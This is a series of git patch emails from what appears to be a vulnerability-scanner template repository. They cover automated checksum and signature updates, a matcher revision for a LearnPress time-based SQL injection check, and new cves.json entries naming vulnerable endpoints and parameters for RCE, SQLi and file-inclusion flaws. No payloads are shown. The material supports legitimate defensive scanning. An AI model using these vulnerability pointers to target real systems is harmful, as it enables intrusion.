+http/technologies/wordpress/plugins/wp-optimize.yaml:5488e9484f0e17998bbbea85cb19b3245100917c +http/technologies/wordpress/plugins/wp-pagenavi.yaml:eee8f335071631505caef531a34c68198db2e121 +http/technologies/wordpress/plugins/wp-reset.yaml:cce0fd7135119d9115a12d3bdb11a9c613910ff4 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:f314766084e712e539da2986df7c3cb81d4304df +http/technologies/wordpress/plugins/wp-rollback.yaml:49e0338e38862c60caacefa5741ac1f0da239bcf +http/technologies/wordpress/plugins/wp-seopress.yaml:5c042c48ffe12c90b4c0d6ef208e64f4fd55de70 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:b40d7b5a93ccd347a4836ed5a5f8c60228f9dba6 +http/technologies/wordpress/plugins/wp-smushit.yaml:1c3518c5a74f9305c6a7e943bb6f82ddd9a3eb73 +http/technologies/wordpress/plugins/wp-statistics.yaml:f7ef8791b19cc7806b94ea8fe27bb45b2b363a79 +http/technologies/wordpress/plugins/wp-super-cache.yaml:6aa07fd993ad37c92a13f29b66a7fb6af51ade4f http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 -http/technologies/wordpress/plugins/wpforms-lite.yaml:1fcff3d3b881c0f9dcf700cf7751c5297ee289ce -http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:30c423eca35cbbdac12de389ad8f3d3744dd2718 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:3cd9ca1ac29d0bb78edc4f5a5ee668d23fe891e5 +http/technologies/wordpress/plugins/wpforms-lite.yaml:7b52dc91093c05ac604a1e1c6f4b035867b05a2b +http/technologies/wordpress/plugins/wps-hide-login.yaml:49fcf56abc3c21e60f2bbaf47dcec51daf6f1454 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:33b3b16f9e8da8d4c8f96f13ba0b84eda5ed0a52 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:f6b5093d6972b7e0fa2431c60448e79b032a0859 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8822,7 +8824,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:b940118fe4379021ad8d4632539d9d209aaa69ff +templates-checksum.txt:6db10d7667c42ab9b767a43c75ea3113edfdc72b wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From b24d0746c79297e7d7facc7429e954694afff426 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 4 Jul 2024 08:03:57 +0000 Subject: [PATCH 0860/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 4b0eb71cce..c142ff77b9 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -10,6 +10,7 @@ on: - 'http/cves/2023/CVE-2023-52251.yaml' - 'http/cves/2024/CVE-2024-27292.yaml' - 'http/cves/2024/CVE-2024-32709.yaml' + - 'http/cves/2024/CVE-2024-33605.yaml' - 'http/cves/2024/CVE-2024-34102.yaml' - 'http/cves/2024/CVE-2024-37152.yaml' - 'http/cves/2024/CVE-2024-37881.yaml' From 12f191f6d27c1ea39a5a07580659bce94bb4ee28 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 4 Jul 2024 08:05:01 +0000 Subject: [PATCH 0861/1841] Auto Template Signing [Thu Jul 4 08:05:01 UTC 2024] :robot: --- dast/vulnerabilities/injection/csv-injection.yaml | 1 + http/cves/2024/CVE-2024-33605.yaml | 1 + http/misconfiguration/forgejo-repo-exposure.yaml | 3 ++- http/misconfiguration/installer/piwigo-installer.yaml | 1 + 4 files changed, 5 insertions(+), 1 deletion(-) diff --git a/dast/vulnerabilities/injection/csv-injection.yaml b/dast/vulnerabilities/injection/csv-injection.yaml index e0fb0f2e30..cc308d842c 100644 --- a/dast/vulnerabilities/injection/csv-injection.yaml +++ b/dast/vulnerabilities/injection/csv-injection.yaml @@ -47,3 +47,4 @@ http: - "text/csv" - "application/csv" - "application/vnd.ms-excel" +# digest: 490a0046304402204637711c31973ca215ff678049acd7760fb780a0ea7094bd8ad65b080710868b0220553b6b7eb287d6ac7283b9b177cc5596847c8a0bc09bfb88c4d3abc79384151e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-33605.yaml b/http/cves/2024/CVE-2024-33605.yaml index 806a09453d..35865304bc 100644 --- a/http/cves/2024/CVE-2024-33605.yaml +++ b/http/cves/2024/CVE-2024-33605.yaml @@ -45,3 +45,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100c5b2cbe816dd280d1fd71f4b2e8e9daa71993e7412bbc86d52ca19d19223684202202d01ae415d5fd8c3758945e17036e3d319cb90bac3eccf633c9f337e91b77272:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/forgejo-repo-exposure.yaml b/http/misconfiguration/forgejo-repo-exposure.yaml index 67babc19b1..31b7e6ab28 100644 --- a/http/misconfiguration/forgejo-repo-exposure.yaml +++ b/http/misconfiguration/forgejo-repo-exposure.yaml @@ -29,4 +29,5 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 +# digest: 4a0a0047304502204f611b23d496d29d165afd0ea65d5773544fa8ff3ae5ffbe6f250cb739ae54ee022100cf5238e980463227b0b6cec712441f4ffd5c31a01e63890f8183fdc45deb555a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/piwigo-installer.yaml b/http/misconfiguration/installer/piwigo-installer.yaml index fea6c9aac8..7c72cbb798 100644 --- a/http/misconfiguration/installer/piwigo-installer.yaml +++ b/http/misconfiguration/installer/piwigo-installer.yaml @@ -27,3 +27,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100eeddac8af33ba19fd2bfab6bbd54b0161f3c93e0247010be93bceee0da5c140402207100dd147f60943aaa53e1183e09e7886871302d663be5d0b0dcb97c7b9f11fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 9cfbe9a22dc9b436756cda77d9108113c3b4d8c7 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 4 Jul 2024 08:05:20 +0000 Subject: [PATCH 0862/1841] Auto Generated New Template Addition List [Thu Jul 4 08:05:20 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 795927c369..791dcbedbf 100644 --- a/.new-additions +++ b/.new-additions @@ -19,6 +19,7 @@ http/exposed-panels/apache/apache-apollo-panel.yaml http/exposed-panels/dialogic-xms-console.yaml http/exposed-panels/endpoint-protector-panel.yaml http/exposures/backups/sql-server-dump.yaml +http/exposures/configs/apache-pinot-config.yaml http/exposures/configs/filestash-admin-config.yaml http/exposures/configs/neo4j-neodash-config.yaml http/misconfiguration/forgejo-repo-exposure.yaml @@ -27,6 +28,7 @@ http/misconfiguration/installer/piwigo-installer.yaml http/misconfiguration/installer/poste-io-installer.yaml http/misconfiguration/installer/subrion-installer.yaml http/misconfiguration/seq-dashboard-unath.yaml +http/technologies/apache/apache-pinot-detect.yaml http/technologies/neo4j-neodash-detect.yaml http/technologies/wordpress/plugins/chaty.yaml http/vulnerabilities/backdoor/polyfill-backdoor.yaml From 1cc2c1673dba97a23b920ecef74efd375004208e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 4 Jul 2024 08:05:26 +0000 Subject: [PATCH 0863/1841] Auto Generated Templates Checksum [Thu Jul 4 08:05:26 UTC 2024] :robot: --- templates-checksum.txt | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index bec1555d46..88358e57d3 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4811,6 +4811,7 @@ http/exposures/configs/alibaba-canal-info-leak.yaml:9a0d928feb9c023e106d2e5fb6d4 http/exposures/configs/amazon-docker-config.yaml:1d8f327855f92a3e31436e4ba787bf72c1593362 http/exposures/configs/ansible-config-disclosure.yaml:49727934f2ea10682033bb7b7d2886c8120e599c http/exposures/configs/apache-config.yaml:f44a3a1e85855c7d7e0a98987e169b4d8c9953de +http/exposures/configs/apache-pinot-config.yaml:7f0c551e050e825923cd69f82442de5d04e4d7b2 http/exposures/configs/appspec-yml-disclosure.yaml:6bc7aaae85de1d64d2ad28ca4474205b6cba4a1a http/exposures/configs/appveyor-configuration-file.yaml:20b64eb403f080bf2a11eaf98f3010f97a7ddd39 http/exposures/configs/aws-config.yaml:193af91d07b6ff68bd8ea13f10a65de246c92f4d @@ -6855,6 +6856,7 @@ http/technologies/apache/apache-detect.yaml:1ec0c234a8a4487c59726af437b6eaa1fa24 http/technologies/apache/apache-dubbo-detect.yaml:454eb1d29924d2b5f4a9f6765d3062646950f91a http/technologies/apache/apache-guacamole.yaml:8c7975c569769ee074f51307e0d963b816e631aa http/technologies/apache/apache-karaf-panel.yaml:50fa0b20105a0786c5ce5ddce7aa5c49237bfafa +http/technologies/apache/apache-pinot-detect.yaml:dde9436d642150f3a2c44f4dad0cc638bdb37895 http/technologies/apache/apache-tapestry-detect.yaml:e909341eeb3f54c209d395e2d5277b754985d70c http/technologies/apache/apache-zeppelin-detect.yaml:2be8f1552e97541d05b1a9ed6d9fda8b2d9df37d http/technologies/apache/default-apache-test-all.yaml:33897b090e11d9010b30d678a0201c5e4e94b543 @@ -8824,7 +8826,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:6db10d7667c42ab9b767a43c75ea3113edfdc72b +templates-checksum.txt:4e31225e5ec2bd85256915665400986f70d78842 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 2f21dfdbfceda185c234433cfd7edd049c835a2f Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 4 Jul 2024 08:06:06 +0000 Subject: [PATCH 0864/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index c142ff77b9..91888ec1a4 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -24,6 +24,7 @@ on: - 'http/exposed-panels/dialogic-xms-console.yaml' - 'http/exposed-panels/endpoint-protector-panel.yaml' - 'http/exposures/backups/sql-server-dump.yaml' + - 'http/exposures/configs/apache-pinot-config.yaml' - 'http/exposures/configs/filestash-admin-config.yaml' - 'http/exposures/configs/neo4j-neodash-config.yaml' - 'http/misconfiguration/forgejo-repo-exposure.yaml' @@ -32,6 +33,7 @@ on: - 'http/misconfiguration/installer/poste-io-installer.yaml' - 'http/misconfiguration/installer/subrion-installer.yaml' - 'http/misconfiguration/seq-dashboard-unath.yaml' + - 'http/technologies/apache/apache-pinot-detect.yaml' - 'http/technologies/neo4j-neodash-detect.yaml' - 'http/technologies/wordpress/plugins/chaty.yaml' - 'http/vulnerabilities/backdoor/polyfill-backdoor.yaml' From 9194db807f2acba01a3317ea09a923bdd1640799 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 4 Jul 2024 13:38:57 +0530 Subject: [PATCH 0865/1841] updated matcher --- http/cves/2024/CVE-2024-4434.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/http/cves/2024/CVE-2024-4434.yaml b/http/cves/2024/CVE-2024-4434.yaml index 216190c993..a4b03576a5 100644 --- a/http/cves/2024/CVE-2024-4434.yaml +++ b/http/cves/2024/CVE-2024-4434.yaml @@ -8,9 +8,9 @@ info: The LearnPress WordPress LMS Plugin plugin for WordPress is vulnerable to time-based SQL Injection via the ‘term_id’ parameter in versions up to, and including, 4.2.6.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. remediation: Fixed in 4.2.6.6 reference: - - https://nvd.nist.gov/vuln/detail/CVE-2024-4434 - https://inky-knuckle-2c2.notion.site/Unauthenticated-SQLI-in-Learnpress-plugin-Version-4-2-6-5-a86fe63bcc7b4c9988802688211817fd - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learnpress/learnpress-wordpress-lms-plugin-4265-unauthenticated-time-based-sql-injection + - https://nvd.nist.gov/vuln/detail/CVE-2024-4434 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -19,7 +19,7 @@ info: epss-percentile: 0.2659 metadata: verified: true - max-request: 1 + max-request: 2 publicwww-query: "/wp-content/plugins/learnpress" tags: cve,cve2024,wp,wp-plugin,wordpress,sqli,learnpress @@ -43,9 +43,9 @@ http: - type: dsl dsl: - 'duration_2 >= 6' - - 'contains_all(body_2,"status","success")' - - 'contains(content_type,"application/json")' - 'status_code_2 == 200' + - 'contains(content_type,"application/json")' + - 'contains_all(body_2,"No courses were found","success")' condition: and extractors: From 0421ecabe7d3981fc28ba46dabec6d8d16f988a2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 4 Jul 2024 08:10:45 +0000 Subject: [PATCH 0866/1841] Auto Generated Templates Checksum [Thu Jul 4 08:10:45 UTC 2024] :robot: --- templates-checksum.txt | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 88358e57d3..dc38b4f02c 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -234,7 +234,7 @@ dast/vulnerabilities/cmdi/ruby-open-rce.yaml:89c6935b600f5037198944b00841ae4e650 dast/vulnerabilities/crlf/cookie-injection.yaml:47b5859ec897917dcc633dee9d83454b203d2ab8 dast/vulnerabilities/crlf/crlf-injection.yaml:b2a16bd3436b9429d72d4f929ab55ad5ee880a91 dast/vulnerabilities/csti/angular-client-side-template-injection.yaml:a76f2f0b28f4ec95a4d09add80ffff07e7a8f71d -dast/vulnerabilities/injection/csv-injection.yaml:8823eb03c6d5f1913c4927076f9f7cb71f2d0667 +dast/vulnerabilities/injection/csv-injection.yaml:378177bdcce84870c9bccd46e129124b4a329152 dast/vulnerabilities/injection/xinclude-injection.yaml:ebe8c7fa9a358fc76e42e1be9f452e835936f370 dast/vulnerabilities/lfi/lfi-keyed.yaml:62584249ea749ce960527d6675421d9d857d1d7c dast/vulnerabilities/lfi/linux-lfi-fuzz.yaml:bd17c8e51fd1ba5083eb381c1ca1a3792597ef65 @@ -3429,6 +3429,7 @@ http/cves/2024/CVE-2024-29059.yaml:8339d52df93cf5aa744acd122780080e989fe7ca http/cves/2024/CVE-2024-29269.yaml:b0c582055d752cae9d0837e9c4919e94c0fdf100 http/cves/2024/CVE-2024-29824.yaml:46f1ec812df6008b68dadfc51bc4453cbeda7539 http/cves/2024/CVE-2024-29895.yaml:4a7c770772a2e16187ed8e70815f27e897ae7c52 +http/cves/2024/CVE-2024-29972.yaml:2e36f67ede7a13a76d9a0f25759b76932dd5ed24 http/cves/2024/CVE-2024-29973.yaml:e44f85b0fe7297f9b0ed996a2e9c7ca9e985fdb9 http/cves/2024/CVE-2024-3097.yaml:b45cd14894d2dd544156fa7b88ec579b871834a9 http/cves/2024/CVE-2024-3136.yaml:0bdd17ee8bfd01bba9b229c8ddfcdb53092dacf2 @@ -3448,7 +3449,7 @@ http/cves/2024/CVE-2024-3273.yaml:fe07da69c4e263410727d688d92f4e06000f5c00 http/cves/2024/CVE-2024-3274.yaml:b56159631d06052a408c3897ef043b866ce0514c http/cves/2024/CVE-2024-33288.yaml:021f1910a0468103d59167ac39fc9cf77f246bab http/cves/2024/CVE-2024-33575.yaml:bc3e1dc9d582e0bb3430a33791936484425fb962 -http/cves/2024/CVE-2024-33605.yaml:449f7ffd28c4a49acb7bb0c898c90ef99b096de4 +http/cves/2024/CVE-2024-33605.yaml:073678cce93693a49cdbf61160717cff11e51f54 http/cves/2024/CVE-2024-33724.yaml:fc5b67f9b84cdf5d6d592f2238c1fb0ef08592cc http/cves/2024/CVE-2024-3400.yaml:446beaf529f998b8b0c5957b75870f5198c21ff2 http/cves/2024/CVE-2024-34102.yaml:2152d70ae35f98d6968fad641af063bdd7b8f83b @@ -5536,7 +5537,7 @@ http/misconfiguration/express-stack-trace.yaml:5d6a09415331603b6718bb7b766f90606 http/misconfiguration/feiyuxing-info-leak.yaml:8283a5c83d32a5290bfb243fa629e47e8aecdadf http/misconfiguration/filebrowser-unauth.yaml:a888d5a22057e6a9bad36d051b74f2092ccc61ff http/misconfiguration/flask-redis-docker.yaml:884961c3e4b03b5cff631eae034ce3add285e676 -http/misconfiguration/forgejo-repo-exposure.yaml:5e8b5c8ac2a835f9df1ccbd28130794c7f744fd8 +http/misconfiguration/forgejo-repo-exposure.yaml:488bb40106fd98d7dae36f0e21f19eb9daade0a0 http/misconfiguration/formalms-install.yaml:c81cf4919398991aef477d82b3ff17742f7d2280 http/misconfiguration/front-page-misconfig.yaml:43a1c8208f0ac3863a17fa06b8fe9c014fbf8a6a http/misconfiguration/fusionauth-admin-setup.yaml:a0bcf30e5ef642af46bb01a7135a26c24d894dfc @@ -5690,7 +5691,7 @@ http/misconfiguration/installer/phpgedview-installer.yaml:c3abf51106828355409764 http/misconfiguration/installer/phpipam-installer.yaml:fd13b9a8528ac804f19dea5ffb775e82aa01b87d http/misconfiguration/installer/phpmyfaq-installer.yaml:d21e8a4ea781328f94303a5d1ac610abb96a19a6 http/misconfiguration/installer/phpwind-installer.yaml:382bd97db9268ea3922f6ea937ef2d07a77c0cf0 -http/misconfiguration/installer/piwigo-installer.yaml:545259e01f02d7c7a705e1fc31771e50f75e991c +http/misconfiguration/installer/piwigo-installer.yaml:73866c263ea17addcfd441a71b5ef36d0bb7738e http/misconfiguration/installer/piwik-installer.yaml:13b6e4cc5e4a106ac91c0f984089a3465a67af49 http/misconfiguration/installer/pmm-installer.yaml:32509e9fe33719aacf310d33d0a40b3f1c065e91 http/misconfiguration/installer/poste-io-installer.yaml:6c3bbd9a9921a652911b49917071d448b427e2ad @@ -8826,7 +8827,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:4e31225e5ec2bd85256915665400986f70d78842 +templates-checksum.txt:d79968e551d7cd70d90f8cbf020b1b194d32f545 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 61734b9671534a289282db3af6e0bda7c85c2a9a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 4 Jul 2024 08:10:48 +0000 Subject: [PATCH 0867/1841] Auto Generated cves.json [Thu Jul 4 08:10:48 UTC 2024] :robot: --- cves.json | 5 +++++ cves.json-checksum.txt | 2 +- 2 files changed, 6 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index f46ba709a8..88414e9ef5 100644 --- a/cves.json +++ b/cves.json @@ -2149,6 +2149,7 @@ {"ID":"CVE-2023-33568","Info":{"Name":"Dolibarr Unauthenticated Contacts Database Theft","Severity":"high","Description":"An issue in Dolibarr 16 before 16.0.5 allows unauthenticated attackers to perform a database dump and access a company's entire customer file, prospects, suppliers, and employee information if a contact file exists.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-33568.yaml"} {"ID":"CVE-2023-33629","Info":{"Name":"H3C Magic R300-2100M - Remote Code Execution","Severity":"high","Description":"H3C Magic R300 version R300-2100MV100R004 was discovered to contain a stack overflow via the DeltriggerList interface at /goform/aspForm.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-33629.yaml"} {"ID":"CVE-2023-3368","Info":{"Name":"Chamilo LMS \u003c= v1.11.20 Unauthenticated Command Injection","Severity":"critical","Description":"Command injection in `/main/webservices/additional_webservices.php`\nin Chamilo LMS \u003c= v1.11.20 allows unauthenticated attackers to obtain\nremote code execution via improper neutralisation of special characters.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3368.yaml"} +{"ID":"CVE-2023-3380","Info":{"Name":"WAVLINK WN579X3 - Remote Command Execution","Severity":"critical","Description":"Remote Command Execution vulnerability in WAVLINK WN579X3 routers via pingIp parameter in /cgi-bin/adm.cgi.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3380.yaml"} {"ID":"CVE-2023-33831","Info":{"Name":"FUXA - Unauthenticated Remote Code Execution","Severity":"critical","Description":"A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-33831.yaml"} {"ID":"CVE-2023-34020","Info":{"Name":"Uncanny Toolkit for LearnDash - Open Redirection","Severity":"medium","Description":"A vulnerability in the WordPress Uncanny Toolkit for LearnDash Plugin allowed malicious actors to redirect users, posing a potential risk of phishing incidents. The issue has been resolved in version 3.6.4.4, and users are urged to update for security.\n","Classification":{"CVSSScore":"4.7"}},"file_path":"http/cves/2023/CVE-2023-34020.yaml"} {"ID":"CVE-2023-34124","Info":{"Name":"SonicWall GMS and Analytics Web Services - Shell Injection","Severity":"critical","Description":"The authentication mechanism in SonicWall GMS and Analytics Web Services had insufficient checks, allowing authentication bypass. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34124.yaml"} @@ -2403,6 +2404,7 @@ {"ID":"CVE-2024-26331","Info":{"Name":"ReCrystallize Server - Authentication Bypass","Severity":"high","Description":"This vulnerability allows an attacker to bypass authentication in the ReCrystallize Server application by manipulating the 'AdminUsername' cookie. This gives the attacker administrative access to the application's functionality, even when the default password has been changed.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-26331.yaml"} {"ID":"CVE-2024-27198","Info":{"Name":"TeamCity \u003c 2023.11.4 - Authentication Bypass","Severity":"critical","Description":"In JetBrains TeamCity before 2023.11.4 authentication bypass allowing to perform admin actions was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-27198.yaml"} {"ID":"CVE-2024-27199","Info":{"Name":"TeamCity \u003c 2023.11.4 - Authentication Bypass","Severity":"high","Description":"In JetBrains TeamCity before 2023.11.4 path traversal allowing to perform limited admin actions was possible\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-27199.yaml"} +{"ID":"CVE-2024-27292","Info":{"Name":"Docassemble - Local File Inclusion","Severity":"high","Description":"Docassemble is an expert system for guided interviews and document assembly. The vulnerability allows attackers to gain unauthorized access to information on the system through URL manipulation. It affects versions 1.4.53 to 1.4.96. The vulnerability has been patched in version 1.4.97 of the master branch.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-27292.yaml"} {"ID":"CVE-2024-27348","Info":{"Name":"Apache HugeGraph-Server - Remote Command Execution","Severity":"high","Description":"Apache HugeGraph-Server is an open-source graph database that provides a scalable and high-performance solution for managing and analyzing large-scale graph data. It is commonly used in Java8 and Java11 environments. However, versions prior to 1.3.0 are vulnerable to a remote command execution (RCE) vulnerability in the gremlin component.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-27348.yaml"} {"ID":"CVE-2024-27497","Info":{"Name":"Linksys E2000 1.0.06 position.js Improper Authentication","Severity":"high","Description":"Linksys E2000 Ver.1.0.06 build 1 is vulnerable to authentication bypass via the position.js file.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-27497.yaml"} {"ID":"CVE-2024-27564","Info":{"Name":"ChatGPT个人专用版 - Server Side Request Forgery","Severity":"high","Description":"A Server-Side Request Forgery (SSRF) in pictureproxy.php of ChatGPT commit f9f4bbc allows attackers to force the application to make arbitrary requests via injection of crafted URLs into the urlparameter.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-27564.yaml"} @@ -2418,6 +2420,7 @@ {"ID":"CVE-2024-29269","Info":{"Name":"Telesquare TLR-2005KSH - Remote Command Execution","Severity":"critical","Description":"Telesquare Tlr-2005Ksh is a Sk Telecom Lte router from South Korea's Telesquare company.Telesquare TLR-2005Ksh versions 1.0.0 and 1.1.4 have an unauthorized remote command execution vulnerability. An attacker can exploit this vulnerability to execute system commands without authorization through the Cmd parameter and obtain server permissions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-29269.yaml"} {"ID":"CVE-2024-29824","Info":{"Name":"Ivanti EPM - Remote Code Execution","Severity":"critical","Description":"An unspecified SQL Injection vulnerability in Core server of Ivanti EPM 2022 SU5 and prior allows an unauthenticated attacker within the same network to execute arbitrary code.\n","Classification":{"CVSSScore":"9.6"}},"file_path":"http/cves/2024/CVE-2024-29824.yaml"} {"ID":"CVE-2024-29895","Info":{"Name":"Cacti cmd_realtime.php - Command Injection","Severity":"critical","Description":"Cacti provides an operational monitoring and fault management framework. A command injection vulnerability on the 1.3.x DEV branch allows any unauthenticated user to execute arbitrary command on the server when `register_argc_argv` option of PHP is `On`. In `cmd_realtime.php` line 119, the `$poller_id` used as part of the command execution is sourced from `$_SERVER['argv']`, which can be controlled by URL when `register_argc_argv` option of PHP is `On`. And this option is `On` by default in many environments such as the main PHP Docker image for PHP.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-29895.yaml"} +{"ID":"CVE-2024-29972","Info":{"Name":"Zyxel NAS326 Firmware \u003c V5.21(AAZF.17)C0 - NsaRescueAngel Backdoor Account","Severity":"critical","Description":"The command injection vulnerability in the CGI program \"remote_help-cgi\" in Zyxel NAS326 firmware versions before V5.21(AAZF.17)C0 and NAS542 firmware versions before V5.21(ABAG.14)C0 could allow an unauthenticated attacker to execute some operating system (OS) commands by sending a crafted HTTP POST request.\n","Classification":{"CVSSScore":"9.88"}},"file_path":"http/cves/2024/CVE-2024-29972.yaml"} {"ID":"CVE-2024-29973","Info":{"Name":"Zyxel NAS326 Firmware \u003c V5.21(AAZF.17)C0 - Command Injection","Severity":"critical","Description":"The command injection vulnerability in the “setCookie” parameter in Zyxel NAS326 firmware versions before V5.21(AAZF.17)C0 and NAS542 firmware versions before V5.21(ABAG.14)C0 could allow an unauthenticated attacker to execute some operating system (OS) commands by sending a crafted HTTP POST request.\n","Classification":{"CVSSScore":"9.88"}},"file_path":"http/cves/2024/CVE-2024-29973.yaml"} {"ID":"CVE-2024-3097","Info":{"Name":"NextGEN Gallery \u003c= 3.59 - Missing Authorization to Unauthenticated Information Disclosure","Severity":"medium","Description":"The WordPress Gallery Plugin – NextGEN Gallery plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the get_item function in versions up to, and including, 3.59. This makes it possible for unauthenticated attackers to extract sensitive data including EXIF and other metadata of any image uploaded through the plugin.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-3097.yaml"} {"ID":"CVE-2024-3136","Info":{"Name":"MasterStudy LMS \u003c= 3.3.3 - Unauthenticated Local File Inclusion via template","Severity":"critical","Description":"The MasterStudy LMS plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 